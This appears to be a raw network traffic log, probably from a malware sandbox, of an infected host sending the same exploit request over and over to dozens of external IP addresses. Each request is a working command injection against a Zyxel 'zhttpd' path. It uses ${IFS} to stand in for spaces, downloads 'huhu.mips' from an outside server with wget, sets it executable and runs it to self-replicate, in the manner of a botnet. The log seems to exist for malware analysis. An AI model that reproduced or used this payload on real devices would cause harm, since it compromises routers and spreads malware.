                                              Jan 29, 2024 07:04:08.369343996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8911192.168.2.1436118168.28.17.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369381905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8912192.168.2.1435562152.34.244.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369429111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8913192.168.2.144063038.100.12.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369479895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8914192.168.2.1459976129.56.188.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369503975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8915192.168.2.144817888.25.233.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369563103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8916192.168.2.1456792198.161.7.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369604111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8917192.168.2.1437268112.150.145.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369626999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8918192.168.2.1457378105.120.84.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369662046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8919192.168.2.1451974115.164.50.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369699955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8920192.168.2.143285048.176.243.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369721889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8921192.168.2.1446812159.152.163.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369796991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8922192.168.2.1447642199.220.243.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369844913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8923192.168.2.1459416170.187.100.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369879961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8924192.168.2.1457020129.196.245.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369910955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8925192.168.2.1447560139.213.172.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369963884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8926192.168.2.1434804105.51.244.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369988918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8927192.168.2.1453976201.214.89.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370054007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8928192.168.2.144505613.110.139.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370094061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8929192.168.2.1452396162.78.0.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370151997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8930192.168.2.1458346104.216.83.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370172024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8931192.168.2.1454802190.195.85.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370202065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8932192.168.2.144935827.90.134.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370232105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8933192.168.2.1447878178.156.206.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370294094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8934192.168.2.1449740155.203.191.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370326042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8935192.168.2.144016437.161.19.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370362043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8936192.168.2.1453320114.161.225.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370410919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8937192.168.2.1449094222.0.166.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370448112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8938192.168.2.145163699.169.227.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370479107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8939192.168.2.1435676164.253.88.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370531082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8940192.168.2.1432792200.36.82.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370563030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8941192.168.2.1456180129.232.94.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370614052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8942192.168.2.146004853.247.106.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370636940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8943192.168.2.145425027.77.124.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370661020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8944192.168.2.1433756113.160.250.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370701075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8945192.168.2.144341679.182.159.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370723009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8946192.168.2.143865636.213.24.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370763063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8947192.168.2.145184281.16.81.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370811939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8948192.168.2.143449866.116.25.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370841980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8949192.168.2.144733837.255.82.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370882034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8950192.168.2.1460232107.136.247.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370927095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8951192.168.2.143999827.109.37.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.370953083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8952192.168.2.1433580134.26.109.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371011019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8953192.168.2.145104624.179.241.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371045113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8954192.168.2.145258686.101.14.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371082067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8955192.168.2.1443534189.59.67.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371112108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8956192.168.2.145532090.61.109.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371160984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8957192.168.2.144849477.63.133.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371192932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8958192.168.2.1460106121.23.22.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371228933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8959192.168.2.144873076.232.231.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371246099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8960192.168.2.1435740149.244.120.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371274948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8961192.168.2.1448778121.151.70.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371329069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8962192.168.2.145603663.206.180.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371354103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8963192.168.2.1445820153.124.241.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371393919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8964192.168.2.1433726124.12.6.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371427059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8965192.168.2.144784480.206.173.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371469021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8966192.168.2.1442192104.141.75.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371507883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8967192.168.2.145575634.164.208.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371548891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8968192.168.2.1435320138.135.30.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371584892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8969192.168.2.144850664.196.84.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371625900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8970192.168.2.1436384162.209.55.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371648073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8971192.168.2.143444441.169.32.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371676922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8972192.168.2.145355432.46.53.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371727943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8973192.168.2.145613035.148.241.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.371768951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8974192.168.2.1455412103.191.231.247443
                                              TimestampBytes transferredDirectionData
